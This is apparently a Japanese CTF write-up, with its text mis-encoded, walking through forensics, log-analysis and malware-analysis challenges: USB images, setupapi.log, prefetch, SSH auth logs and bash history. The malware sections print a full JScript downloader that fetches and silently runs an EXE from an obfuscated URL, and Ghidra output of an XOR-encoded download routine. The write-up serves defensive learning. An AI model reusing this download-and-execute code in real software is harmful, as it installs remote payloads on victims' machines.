ã¯ããã«
ãã©ã¬ã³ã¸ãã¯ã®ãã£ã¹ã¯ã¤ã¡ã¼ã¸ã触ãããã®ã§ãã£ã¬ã³ã¸ãããã¨æãã¾ããwriteupã¨ããããã解ããéçãæ¸ãã¦ãã¾ãã®ã§ãæçè·é¢ãç¥ããã人ã«ã¨ã£ã¦ã¯æå³ããããªããã®ããããã¾ããããäºæ¿ãã ãããbegginerã®ãæ¯ãã¨æã£ã¦æããè¦å®ã£ã¦ããã ããã°å¹¸ãã§ããã¾ããsetodaã®æ¹ã§ãè¨è¿°ãã¾ããããgithubã«ä¹ãã¦ããããããã¾ããããããããé¡ããããã¾ãã
éé
2017
ï¼»ã·ããªãªï¼½
å·¥å ´ç¨PCï¼WindowsXPï¼ã§å©ç¨ãã¦ãã社給USBã¡ã¢ãªãããã«ã¦ã§ã¢ãæ¤åºããã¾ãããã©ãããå·¥å ´ç¨PCããã«ã¦ã§ã¢ã«ææãã¦ãã¾ã£ãããã§ããããªãã¯ãå·¥å ´ç¨PCãææããåå ã調æ»ãããã¨ã¨ãã¾ããã
ï¼»åé¡ï¼½
USBã¡ã¢ãªã®ãã£ã¹ã¯ã¤ã¡ã¼ã¸ã®è§£æã«ãããåé¤æ¸ã¿ãã¡ã¤ã«ã®ã¿ã¤ã ã¹ã¿ã³ãã確èªããUSBã¡ã¢ãªã«ãã«ã¦ã§ã¢ãææããæ¥æï¼ï¼æ¥æ¬æéï¼ï¼ãæ¨å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
æææ¥æã®ãã¡ãæãå¤ããã®ï¼YYYY/MM/DD-hh:mm:ssï¼ï¼åè§ï¼
ä¾ï¼2017/01/31-23:59:59
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
ZZBYCPOM
ã¨ãããã¨ã§ãddãã¡ã¤ã«ãæã«å
¥ã£ããUSBã¡ã¢ãªã®è§£æã¯windowsãã¡ã¤ã«ã·ã¹ãã ã®ãã£ã¹ã¯ã¤ã¡ã¼ã¸ã¨åãããã«è§£æã§ããã®ã ãããï¼ã§ãã¾ãã¯ãã¤ãã¨åãããfileã³ãã³ãããããã
ââ# file USB_Factory_MalwareChecked.dd
USB_Factory_MalwareChecked.dd: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "MSDOS5.0", sectors/cluster 2, reserved sectors 6298, Media descriptor 0xf8, sectors/track 63, heads 255, hidden sectors 97, sectors 250527 (volumes > 32 MB), FAT (32 bit), sectors/FAT 947, serial number 0x46bf5711, unlabeled
ã»ã¯ã¿ã¼ã«ã¯åããã¦ããããã ã
ââ# mmls USB_Factory_MalwareChecked.dd
mmlsã³ãã³ãã§ã¯ç¹ã«ãªãã£ããUSBã§ã¯ã ãã®ããã ãautopsyã§è§£æãã¦ããã
ããããã¨åé¤ããããã¡ã¤ã«ã4ã¤ããããã®ä¸ã§å®è¡ãããã§ããã_164.exeããããããããã«ã¦ã§ã¢ã¨èããããã®ä½ææ¥ãå
¥åãããflagã²ããã
ï¼»åé¡ï¼½
å¶æ¥æã«ç¢ºèªããã¨ãããå·¥å ´ç¨PCã§å©ç¨ãã¦ããUSBã¡ã¢ãªã¯ã社給USBã¡ã¢ãªï¼æ¬ã ãã¨ã®ãã¨ã§ãã
ææããå·¥å ´ç¨PCã®ã¬ã¸ã¹ããªã®è§£æã«ãããéå»ã«æ¥ç¶ãããUSBã¡ã¢ãªã®ã·ãªã¢ã«çªå·ã確èªããä¸å¯©USBã¡ã¢ãªãç¹å®ãã¦ãã ããã
ãªããã·ãªã¢ã«çªå·ãSNDKB91EA4346D408606ãã®USBã¡ã¢ãªã¯ã社給USBã¡ã¢ãªã§ãããä¸å¯©USBã¡ã¢ãªã§ã¯ããã¾ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©USBã¡ã¢ãªã®ã·ãªã¢ã«çªå·ï¼åè§ï¼
ä¾ï¼A00001234
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
ZZBYCPOM
ã¨ãããã¨ã§ãå
ã®ç¶ãã®ãããªæããä¸å¯©ãªUSBæ¥ç¶ãè¦ã¤ããããã ããã¤ãéããã¾ãã¯ã³ãã³ãã§ãã£ã¦ã¿ãã
ã¨æã£ãããæ³å®ãã¦ãããã®ã¨éãã\For02\WINDOWS\system32\configã®systemã¨ãããã®ã¨ãsetupapi.logã¨ãããã¡ã¤ã«ã ã渡ããã¦ããã
ç¥è(setupapi.log)
setupapi.log
(SANS DFIR)ãåèã«ããããUSBããã¤ã¹ãæ¥ç¶ã»åæãããæéæ
å ±ã確èªããéã«ä½¿ç¨ãã¾ãããã ããã ã
ç¥èã®ãã¨ããsetupapi.logãè¦ãã®ãæ£è§£ã«è¿ãæ°ããããã¨æã£ãããæå¤ã¨æ¥æ¬èªæ¤ç´¢ããã®ã¯linuxã§ã¯é¢åã(USBã¡ã¢ãªã®æçµä½¿ç¨æ¥ã®ç¢ºèªæ¹æ³)ããããã¤ã¹ã¤ã³ã¹ã¿ã³ã¹ IDããã·ãªã¢ã«çªå·ãåããã
ââ# strings system |grep USB#Vid
ä¸è¨ã®ããã«åºã¦ãããSNDKB91EA4346D408606ãæ¢ç¥ã®ããã¤ã¹ãªã®ã§ãããã«ä¼¼ãã¨ãããæ½åºããã°flagã²ããã
[For03] ä¸å¯©ããã°ã©ã ã®èµ·åæ¥æ
ï¼»åé¡ï¼½
ææããå·¥å ´ç¨PCã®ã¬ã¸ã¹ããªããã³Prefetchã®è§£æã«ãããä¸å¯©USBã¡ã¢ãªã«æ ¼ç´ãããããã°ã©ã ã®èµ·åæ¥æã確èªãããã«ã¦ã§ã¢æææ¥æï¼æ¥æ¬æéï¼ãæ¨å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ãã«ã¦ã§ã¢ã®å®è¡æ¥æã®çè·¡ã®ãã¡ãæãå¤ããã®ï¼YYYY/MM/DD-hh:mm:ssï¼ï¼åè§ï¼
ä¾ï¼2017/01/31-23:59:59
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
ZZBYCPOM
ã¨ãããã¨ã§ãã¾ãã¯prefetchã調ã¹ãã
(ç°¡æ解æå
¥é ããã°ã©ã å®è¡ã®çè·¡ã®èª¿æ» (1)Prefetch)ããwinprefetchViewã§ä»»æã®ãã©ã«ãã®prefetchã確èªã§ããããã ã(PECmd - Windows Prefetchã®è§£æ)ã¾ããã³ãã³ãã§æ±ããã¨ãã§ããããã ãè¦è¦çã§ã¯å¤ãæãããã®ã§ä¾¿å©ã ã
ã¾ãã\For03\Documents and Settings\Administratorã«NTUSER.DATã¨ãããã¡ã¤ã«ããããããã¯ä½ã ããã(NTUSER.DATã¨ã¯ï¼åé¤ã移åãã¡ããã¡ãªãã¡ã¤ã«ã ãï¼)ãåèã«ãããã¤ã¾ãããã«ã¦ã§ã¢ã®å¯è½æ§ãããã¨ãããã¨ã®ããã ã
å
ã»ã©ã®ä¸å¯©ãªUSBãæ¥ç¶ããå¾ã«ãã«ã¦ã§ã¢ã¯å®è¡ãããã¨æãã®ã§ãä¸å¯©ãªUSBãæ¥ç¶ãããæ¥æãæ¢ãã«è¡ãã
ââ# strings setupapi.log |grep 07083CD4A61B6307 -9
"c:\windows\inf\usbstor.inf"
[USBSTOR_BULK]
X GUID
{36FC9E60-C465-11CF-8056-444553540000}
DIF_INSTALLDEVICEFILES
DIF_REGISTER_COINSTALLERS
DIF_INSTALLINTERFACES
[USBSTOR_BULK.NT.Interfaces]
DIF_INSTALLDEVICE
[2017/10/19 01:17:34 668.7 Driver Install]
以ä¸ã®ãã¨ãã2017/10/19 01:17:34ã®åã®æ¥æ[2017/10/19 01:17:26 668.3 Driver Install]ãæ¥ç¶ãããã¨ãã®æ¥ç¨ã«è¿ãã¨èããããããããããå®è¡ãããã¨ãããæ¨æ¸¬ãããããprefetchã確èªããã
åæå»ã®å®è¡ãããããã®ãã¨ã確èªãã¦ããã¨9164.EXEããããããã¯For01ã®æã«åé¤ããã¦ãããã¡ã¤ã«ã¨ä¼¼ã¦ãããããã®Last Run Timeãå
¥åãããæ£è§£ã
[ForX] FAT32ãã©ã¼ãããæ¥æ
ï¼»åé¡ï¼½
å·¥å ´ç¨PCã®ææåå ã¨ãªã£ãUSBã¡ã¢ãªã¯ããã社å¡ããèªå®
çã§å©ç¨ãã¦ããå人ææç©ãä¼ç¤¾ã«æã¡è¾¼ãã ãã®ã§ããã
å½è©²ç¤¾å¡ããUSBãåç¨ã解æãããã¨ã«ãã¾ããããã©ãããUSBã¡ã¢ãªããã©ã¼ãããããã証æ é æ»
ãå³ãããããã§ãã
USBã¡ã¢ãªã®ãã£ã¹ã¯ã¤ã¡ã¼ã¸ã解æããUSBã¡ã¢ãªããã©ã¼ããããããæ¥æï¼æ¥æ¬æéï¼ãæ¨å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
USBã¡ã¢ãªã®ãã©ã¼ãããæ¥æï¼YYYY/MM/DD-hh:mm:ssï¼ï¼åè§ï¼
ä¾ï¼2017/01/31-23:59:59
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
ZZBYCPOM
ã¨ãããã¨ããããã¾ããã©ã¼ãããã£ã¦ä½ï¼
ç¥è(ãã©ã¼ããã)
ãã©ã¼ããã
(ãã©ã¼ããã)ãåèã«ãããåæåã®ãã¨ãããã
ä»åã¯åãããautopsyã«ã¶ã¡è¾¼ãã ãUSBããã©ã¼ããããããæ¥æãæ¢ãã®ã¯ã©ããããã ããã(USBã¡ã¢ãªã¼ã®ãã©ã¼ãããæé (ä¾ï¼Windows 10 ã®å ´åï¼)ã§ã¯USBã®ãã©ã¼ãããã®ä»æ¹ãæ¸ããã¦ããã
ãã©ã¼ããããèµ·ãããã¨ãã¯ã£ããã¨è¿°ã¹ãçè·¡ãè¦ã¤ãããã¨ã¯ã§ããªãã£ããæ¥æãåãããã®ãSystem Volume informationã¨Volume label entryãããªãã£ãã®ã§ããããå
¥åãããæ£è§£ãä»ã®writeupè¦ããããªã
[ForX-2] FAT32ãã©ã¼ãããæ¥æï¼ç¢ºèªåé¡ï¼
300
ï¼»åé¡ï¼½
ForXãæ£ããç解ã§ãã¦ããã確èªããããã®åé¡ã§ãã
USBã¡ã¢ãªããã©ã¼ããããããæ¥æï¼æ¥æ¬æéï¼ãæ¨å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
USBã¡ã¢ãªã®ãã©ã¼ãããæ¥æï¼YYYY/MM/DD-hh:mm:ssï¼ï¼åè§ï¼
ä¾ï¼2017/01/31-23:59:59
ã¨ãããã¨ã§ãå
ã®åé¡ã®ç¢ºèªåé¡ã®ããã ã
å
ãããæ¥æãåããé¨åãå¤ãã
System Volume informationãã¨ã¦ãæ°ã«ãªãããªããªããä½ææ¥æãæ¸ãã¦ãããããããããVolume label entryã®æ´æ°æ¥æã®æ¹ãæ©ãæ¥æã«ãªã£ã¦ããã®ã¯æ©ã¾ããããã
entryã®æ¹ã«ãããæ£è§£ã
ææ³
windowsã®ã¤ã¡ã¼ã¸ãã£ã¹ã¯ã®åé¡ã解ãããã¨ãä½ãããããããã¨ã¦ã楽ããã£ãã®ã§ä½æè
ã«ã¯æè¬ãè¿°ã¹ããã
ä»ã®ãã©ã¬ã³ã¸ãã¯ã«é²ããã¨èãã¦ããããã»ãã®åé¡ã楽ããããªã®ã§2017ãããå°ãé²ãã¦ããå¥å¹´åº¦ã®ãã®ããã£ã¦ãããã¨æãã
[Log01] 大éã¢ã¯ã»ã¹
100
ï¼»ã·ããªãªï¼½
DMZã«è¨ç½®ãã¦ããã¦ã§ããµã¼ãã®ã¬ã¹ãã³ã¹ãä½ä¸ãã¾ããã
ã©ããã大éã¢ã¯ã»ã¹ã«ãããè² è·ãé«ããªã£ã¦ããããã§ããããªãã¯ãã¦ã§ããµã¼ãã®ãã°ã調æ»ãããã¨ã¨ãã¾ããã
ï¼»åé¡ï¼½
ã¦ã§ããµã¼ãã®ã¢ã¯ã»ã¹ãã°ãåæãã大éã¢ã¯ã»ã¹ããã¦ããIPã¢ãã¬ã¹ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ã¢ã¯ã»ã¹æ°ãæãå¤ãIPã¢ãã¬ã¹ï¼åè§ï¼
ä¾ï¼192.168.0.1
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
ANVWPMRC
ã¨ãããã¨ã§ããã°ãã¼ã¿ã渡ããããwiresharkã§è¦ããªãã®ã§æå¤ã¨ããã©ãããããã
ãã ãæããã«ç°å¸¸ãªã¢ã¯ã»ã¹ããã¦ããIPã¢ãã¬ã¹ããã£ãã®ã§ãããå
¥åãæ£è§£ã
[Log02] SSHã«ããä¸æ£ãã°ã¤ã³
100
ï¼»åé¡ï¼½
大éã¢ã¯ã»ã¹ã®çºä¿¡å
ã¯ãDMZã«è¨ç½®ãã¦ãããã¹ãç¨ãµã¼ãã§ããã
ãã¹ãç¨ãµã¼ãã§ã¯SSHãµã¼ãã¹ã®ã¿ãèµ·åãã¦ãããã¨ãããããªãã¯ããã«ã¼ããã©ã¼ã¹æ»æãªã©ã«ãããSSHã§ãã°ã¤ã³ãããå¯è½æ§ãããã¨èãã調æ»ãããã¨ã¨ãã¾ããã
SSHãµã¼ãã¹ã®ãã°ãåæãããã«ã¼ããã©ã¼ã¹æ»æã«ããä¸æ£ã«ãã°ã¤ã³ãããã¦ã¼ã¶ã¼åãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸æ£ãã°ã¤ã³ãããã¦ã¼ã¶ã¼åï¼åè§ãå°æåï¼
ä¾ï¼john
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
SVQBMHKZ
(èªå®
ã®å
¬ésshãµã¼ãã®ä¸æ£ã¢ã¯ã»ã¹ãã°ã調æ»ãã¦ã¿ã)ãåèã«ãããsshã®ã¢ã¯ã»ã¹ãã°ãauth.logã«ã¯æ®ã£ã¦ããããã ããã°ã¤ã³ãæåããã¨Acceptedã®æåãå«ã¾ããããã ãââ# strings auth.log |grep Accepted
ããããforã®å¾ãã®åèªãã¦ã¼ã¶ã¼åã®ããã ãçµäºã
[Log03] ã·ã§ã«ã®ã³ãã³ãå±¥æ´
100
ï¼»åé¡ï¼½
æ»æè
ã¯ãä¸æ£ã«ãã°ã¤ã³ããå¾ãæ»æç¨ãã¼ã«ãwgetã³ãã³ãã§ãã¦ã³ãã¼ãããã¦ã§ããµã¼ãã«å¤§éã¢ã¯ã»ã¹ããããã§ãã
ã·ã§ã«ã®ã³ãã³ãå±¥æ´ã確èªããæ»æç¨ãã¼ã«ããã¦ã³ãã¼ãããURLãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
æ»æç¨ãã¼ã«ããã¦ã³ãã¼ãããURLï¼åè§ãå°æåï¼
ä¾ï¼http://www.example.com
ï¼»åé¡ãã¡ã¤ã«ï¼½
CACIHZKU
ã¨ãããã¨ã§ãããã渡ãããããã³ãã³ãå±¥æ´ã¯.bash_historyã«ããã®ã§ããã確èªããããniktoã¨ãããã®ãwgetããã¦ããã®ã§ããã®URLãå
¥åãã¦çµäºã
300
ï¼»åé¡ï¼½
ä¸å¸ãããå½é¢ãæµ·å¤ããã®ã¢ã¯ã»ã¹ãå
¨ã¦é®æããããã«ã¨ã®æ示ãããã¾ããã
ããªãã¯ãä½æ¥ã«å
ç«ã¡ãèªç¤¾ã¦ã§ããµã¼ãã«ã¢ã¯ã»ã¹ãã¦ããIPã¢ãã¬ã¹ãåæããå½å
ã¨å½å¤ã®ã¢ã¯ã»ã¹ã®å²åã確èªãããã¨ã¨ãã¾ããã
Apacheãã°ãåæãããã°ã«è¨é²ããã¦ããå½å
ï¼æ¥æ¬ï¼ã®IPã¢ãã¬ã¹æ°ãè¨ä¸ãã¦ãã ããããã°ã«åãIPã¢ãã¬ã¹ãè¤æ°åè¨é²ããã¦ããå ´åã¯ãï¼åã¨æ°ãã¦ãã ããã
ãªããIPã¢ãã¬ã¹ã®å½å
ã»å½å¤ã®å¤å®ã¯ãåé¡ãã¡ã¤ã«ã¨ãé
å¸ãããdelegated-apnic-extended-latestãï¼APNICãå
¬éãã¦ããå½å¥ã®IPã¢ãã¬ã¹ã®å²ãå½ã¦ä¸è¦§ï¼ã«ãããã®ã¨ãã¾ãã
ï¼»ãã©ã°ï¼½
ãã°ã«è¨é²ããã¦ããå½å
IPã¢ãã¬ã¹æ°ï¼åè§æ°åï¼
ä¾ï¼12345
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
JIJOFQKA
ã¾ãã®æ©ä¼ãã¡ãã£ã¨ã³ã¼ãæ¸ãæ°åã§ãªãã
[Mal01] ãã«ã¦ã§ã¢ã®éä¿¡å
ï¼EXEç·¨ï¼
100
ï¼»ã·ããªãªï¼½
æè¿ãæ¯æ¥ã®ããã«ãè¤æ°ã®ç¤¾å¡ãããä¸å¯©ã¡ã¼ã«ãå±ããã¨ã®éå ±ãããã¾ãã
æ¯åãåä¿¡è
ãã¨ã«ã¡ã¼ã«ã®å·®åºäººã件åãæ¬æãªã©ã¯ã©ã³ãã ã«è¨å®ããã¦ãã¾ãã
æ·»ä»ãã¡ã¤ã«åãã©ã³ãã ã«è¨å®ããã¦ãã¾ãããåä¿¡æ¥ãåãã§ããã°ããã¡ã¤ã«ã®å
容ï¼ããã·ã¥å¤ï¼ã¯åãã§ãããéå°ããã¨ä¸å¯©ãªéä¿¡ãçºçãã¾ãã
ãã¦ãæ¬æ¥ãä¸å¯©ã¡ã¼ã«ãå±ããã¨ã®éå ±ãããã¾ãããããªãã¯ãæ·»ä»ãã¡ã¤ã«ã解æããä¸å¯©éä¿¡å
ã確èªãããã¨ã¨ãã¾ããã
ï¼»åé¡ï¼½
ï¼äºä¾ï¼ï¼ä¸å¯©ãªæ·»ä»ãã¡ã¤ã«ï¼EXEå½¢å¼ï¼ã解æããéä¿¡å
ãç¹å®ãã¦ãã ããã
ï¼»è£è¶³ï¼½
æ·»ä»ãã¡ã¤ã«ã¯ã»ãã¥ãªãã£å¯¾çã½ããã§ãã¦ã³ãã¼ãã¼ã¨ãã¦æ¤ç¥ããã¾ããã模æ¬ãã«ã¦ã§ã¢ã§ãããå®å®³ã¯ããã¾ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©éä¿¡å
ã®URLï¼åè§ãå°æåï¼
ä¾ï¼http://www.example.com
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
BNIWSTRV
ã¨ããããã§ãæªããexeãã¡ã¤ã«ã渡ããããå®è¡ããªãããã«æ³¨æã§ããã
ã§ãããã¨ã¯éç解æãªã®ã§ãstringsã³ãã³ããã¦URLã£ã½ãã®ãå
¥åãçµäºã
[Mal02] ãã«ã¦ã§ã¢ã®éä¿¡å
ï¼JSç·¨ï¼
100
ï¼»åé¡ï¼½
ï¼äºä¾ï¼ï¼ä¸å¯©ãªæ·»ä»ãã¡ã¤ã«ï¼JSå½¢å¼ï¼ã解æããéä¿¡å
ãç¹å®ãã¦ãã ããã
ï¼»è£è¶³ï¼½
æ·»ä»ãã¡ã¤ã«ã¯ã»ãã¥ãªãã£å¯¾çã½ããã§ãã¦ã³ãã¼ãã¼ã¨ãã¦æ¤ç¥ããã¾ããã模æ¬ãã«ã¦ã§ã¢ã§ãããå®å®³ã¯ããã¾ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©éä¿¡å
ã®URLï¼åè§ãå°æåï¼
ä¾ï¼http://www.example.com
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
KCKEPSOS
ã¨ããããã§ãå
ã¨åãã
ââ# strings Downloader.js
strUrl = String.fromCharCode(104,116,116,112,58,47,47,109,97,108,119,97,114,101,95,100,105,115,116,114,105,98,117,116,101,114,46,99,111,46,105,110,118,97,108,105,100,47,77,101,115,115,97,103,101,66,111,120,46,101,120,101);
obj_shell = WScript.CreateObject("WScript.Shell");
path = obj_shell.ExpandEnvironmentStrings("%TEMP%\\a.exe");
obj_http = WScript.CreateObject("MSXML2.XMLHTTP");
obj_http.open("GET",strUrl,false);
obj_http.send();
while(obj_http.readystate != 4){
WScript.Sleep(1000);
obj_strm = WScript.CreateObject("Adodb.Stream");
adTypeBinary = 1;
adSaveCreateOverWrite = 2;
obj_strm.Type = adTypeBinary;
obj_strm.Open();
obj_strm.Write(obj_http.responseBody);
obj_strm.SaveToFile(path, adSaveCreateOverWrite);
obj_shell.Run(path,0,0);
é£èªåããã¦ãã模æ§ãããããã
strUrl = String.fromCharCode(104,116,116,112,58,47,47,109,97,108,119,97,114,101,95,100,105,115,116,114,105,98,117,116,101,114,46,99,111,46,105,110,118,97,108,105,100,47,77,101,115,115,97,103,101,66,111,120,46,101,120,101);
ãcharcodeã¨ãã¦ãã³ã¼ãããã¦URLã«ãªãããã ãcyberchefã«ã¶ã¡è¾¼ãã§magicã§ããæãã«ãããçµäºã
[Mal03] ãã«ã¦ã§ã¢ã®éä¿¡å
ï¼LNKç·¨ï¼
100
ï¼»åé¡ï¼½
ï¼äºä¾ï¼ï¼ä¸å¯©ãªæ·»ä»ãã¡ã¤ã«ï¼LNKå½¢å¼ï¼ã解æããéä¿¡å
ãç¹å®ãã¦ãã ããã
ï¼»è£è¶³ï¼½
æ·»ä»ãã¡ã¤ã«ã¯ã»ãã¥ãªãã£å¯¾çã½ããã§ãã¦ã³ãã¼ãã¼ã¨ãã¦æ¤ç¥ããã¾ããã模æ¬ãã«ã¦ã§ã¢ã§ãããå®å®³ã¯ããã¾ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©éä¿¡å
ã®URLï¼åè§ãå°æåï¼
ä¾ï¼http://www.example.com
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
CHTQPMKW
ãããåååæ§ãstringsã
ââ# strings DownLoader.lnk
/C:\
TKcr
Windows
TKcr*
System32
cmd.exe
C:\Windows\System32\cmd.exe
1SPS0
1SPS
1SPS
sf"=
1SPS
jc(=
student-pc
Fb$g
%ComSpec%
cmdãç«ã¡ä¸ãã£ã¦ãããURLã¯è¦å½ãããªããcatã«ãããåºã¦ãããæåæ°é¢ä¿ã§ãã¾ã表示ã§ããªãã£ãã®ã¨äºæ³ã
[MalX] ãã«ã¦ã§ã¢ã®éä¿¡å
ï¼EXEç·¨ãã®ï¼ï¼
300
ï¼»åé¡ï¼½
ï¼äºä¾ï¼ï¼ä¸å¯©ãªæ·»ä»ãã¡ã¤ã«ï¼EXEå½¢å¼ï¼ã解æããéä¿¡å
ãç¹å®ãã¦ãã ããã
ãªãããã®ãã«ã¦ã§ã¢ã¯ç¹å®ã®æ¡ä»¶ä¸ã§ããåä½ããªãããã§ãã
ï¼»è£è¶³ï¼½
æ·»ä»ãã¡ã¤ã«ã¯ã»ãã¥ãªãã£å¯¾çã½ããã§ãã¦ã³ãã¼ãã¼ã¨ãã¦æ¤ç¥ããã¾ããã模æ¬ãã«ã¦ã§ã¢ã§ãããå®å®³ã¯ããã¾ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©éä¿¡å
ã®URLï¼åè§ãå°æåï¼
ä¾ï¼http://www.example.com
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
TOCDWIES
åæãstringsãã¦ã¿ãããURLã£ã½ãã®ã¯ãªããå¯èªã§ãããã®ã¯å¤ãããããããããªããé£èªåãªã®ã ãããï¼
stringsãcatã§ã¯æ¨ããããªãã£ãã®ã§ãghidraã§éç解æãè¡ãã
local_358[0] = 0xaa;
local_358[1] = 0xb6;
local_358[2] = 0xb6;
local_358[3] = 0xb2;
local_358[4] = 0xf8;
local_358[5] = 0xed;
local_358[6] = 0xed;
local_358[7] = 0xaf;
local_358[8] = 0xa3;
local_358[9] = 0xae;
local_358[10] = 0xb5;
local_358[11] = 0xa3;
local_358[12] = 0xb0;
local_358[13] = 0xa7;
local_358[14] = 0x9d;
local_358[15] = 0xb0;
local_358[16] = 0xa7;
local_358[17] = 0xb4;
local_358[18] = 0xa7;
local_358[19] = 0xb0;
local_358[20] = 0xb1;
local_358[21] = 0xa7;
local_358[22] = 0xb0;
local_358[23] = 0xec;
local_358[24] = 0xa1;
local_358[25] = 0xad;
local_358[26] = 0xaf;
local_358[27] = 0xed;
local_358[28] = 0x8f;
local_358[29] = 0xa7;
local_358[30] = 0xb1;
local_358[31] = 0xb1;
local_358[32] = 0xa3;
local_358[33] = 0xa5;
local_358[34] = 0xa7;
local_358[35] = 0x80;
local_358[36] = 0xad;
local_358[37] = 0xba;
local_358[38] = 0xec;
local_358[39] = 0xa7;
local_358[40] = 0xba;
local_358[41] = 0xa7;
local_358[42] = 0xc2;
local_18 = 0xc2;
local_228 = (uint *)_getenv(&DAT_0040f000);
local_1c = s_\MessageBox.exe_0040f008;
local_224._0_1_ = '\0';
_memset((undefined *)((int)&local_224 + 1),0,0x1ff);
local_14 = FUN_004012a0((__time64_t *)0x0);
local_20 = FUN_00401280(&local_14);
if (((*(int *)(local_20 + 0x14) == 0x75) && (*(int *)(local_20 + 0x10) == 10)) &&
(*(int *)(local_20 + 0xc) == 0xd)) {
for (local_8 = 0; local_8 < 0x2b; local_8 = local_8 + 1) {
local_32c[local_8] = local_358[local_8] ^ (byte)local_18;
}
FUN_004012d0(&local_224,local_228);
FUN_004012d0(&local_224,(uint *)local_1c);
URLDownloadToFileA((LPUNKNOWN)0x0,(LPCSTR)local_32c,(LPCSTR)&local_224,0,
(LPBINDSTATUSCALLBACK)0x0)
ãã¡ããã¡ãæéãããã£ãã®ã¯localã«å®ç¾©ããããã®ããã®ã¾ã¾asciiã«ãããã¨èãã¦ãããã¨ãããããããè¦ãã¨ã local_32c[local_8] = local_358[local_8] ^ (byte)local_18;ã¨æ¼ç®ãå ãããã¦ãããããã§æ··ä¹±ãããåç解æã§ããã°ä¸çªæ©ãã¨æããã
initial = 0xc2
lis= [0xaa,0xb6,0xb6,0xb2,0xf8,0xed,0xed,0xaf,0xa3,0xae,0xb5,0xa3,0xb0,0xa7,0x9d,0xb0,0xa7,0xb4,0xa7,0xb0,0xb1,0xa7,0xb0,0xec,0xa1,0xad,0xaf,0xed,0x8f,0xa7,0xb1,0xb1,0xa3,0xa5,0xa7,0x80,0xad,0xba,0xec,0xa7,0xba,0xa7,0xc2]
URL = list(range(len(lis)))
count = 0x00
while (count < 0x2b):
URL[count] = lis[count] ^ initial
count = count + 0x01
print(URL)
ã¨ããã¨æ°å¤åãåºã¦ããããããcyberchefã®from Decimal
ã«ã¶ã¡è¾¼ãã¨URLãåºã¦ãããâ»magicã§ã¯åå¿ããªãã®ã§æ³¨æã
ææ³
4åç®ããã¡ããã¡ãæéããã£ããéç解æ(rev)ãè¦æãªã®ãããã§å½±é¿ããã¨æãã
ã¾ããåç解æã使ãã°ãã£ã¨æ©ãæ¸ãã ã¨æãããã¾ããã«ã¦ã§ã¢ãåç解æããããªãã®ã§ghidraã§ããæ¼ãã¾ããã
ã§ããé£èªåãç¥ããã¨ãã§ãã¦ããã£ãã
[Lab01] ãããã·ãã°ã®èª¿æ»
100
ï¼»ã·ããªãªï¼½
ã¤ã³ã¿ã¼ãããæ¥ç¶ç¹ãç£è¦ãã¦ããIDSãã社å
ãã½ã³ã³ããä¸å¯©ãã¹ããc2.hacker.comãã¸ã®éä¿¡ãçºçãã¦ãããã¨ãæ¤ç¥ãã¾ãããããªãã¯ã社å
ãã½ã³ã³ããã«ã¦ã§ã¢ã«ææãã¦ããå¯è½æ§ãé«ãã¨èãã調æ»ãå®æ½ãããã¨ã¨ãã¾ããã
ï¼»ã·ããªãªï¼½
ã¤ã³ã¿ã¼ãããæ¥ç¶ç¹ãç£è¦ãã¦ããIDSãã社å
ãã½ã³ã³ããä¸å¯©ãã¹ããc2.hacker.comãã¸ã®éä¿¡ãçºçãã¦ãããã¨ãæ¤ç¥ãã¾ãããããªãã¯ã社å
ãã½ã³ã³ããã«ã¦ã§ã¢ã«ææãã¦ããå¯è½æ§ãé«ãã¨èãã調æ»ãå®æ½ãããã¨ã¨ãã¾ããã
ï¼»åé¡ï¼½
ãããã·ãã°ã確èªããä¸å¯©ãã¹ããc2.hacker.comãã¨éä¿¡ãã¦ãã社å
ãã½ã³ã³ï¼ææ端æ«ï¼ã®IPã¢ãã¬ã¹ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ææ端æ«ã®IPã¢ãã¬ã¹ï¼åè§ï¼
ä¾ï¼172.16.0.101
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
OGENJIZM
ã¨ãããã¨ã§ããã°ãã¼ã¿ã渡ããããc2.hacker[.]comã¨éä¿¡ãã¦ããã¨ãããã¨ãªã®ã§ãââ# cat access.log |grep c2.hacker.com
ã§æ¤ç´¢ããããåºã¦ããããã®IPã¢ãã¬ã¹ãæã£ããçµäºã
100
ï¼»åé¡ï¼½
ããªãã¯ãã©ã¬ã³ã¸ãã¯èª¿æ»ã®ãããææ端æ«ï¼Windows7 SP0 32bitçï¼ã®ã¡ã¢ãªã¤ã¡ã¼ã¸ãåå¾ãã¾ããã
ã¡ã¢ãªã¤ã¡ã¼ã¸ã解æããä¸å¯©ãã¹ããc2.hacker.comãã¸ã®éä¿¡ãçºçããã¦ããä¸å¯©ããã»ã¹ã®PIDï¼ããã»ã¹IDï¼ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©ããã»ã¹ã®PIDï¼åè§ï¼
ä¾ï¼1234
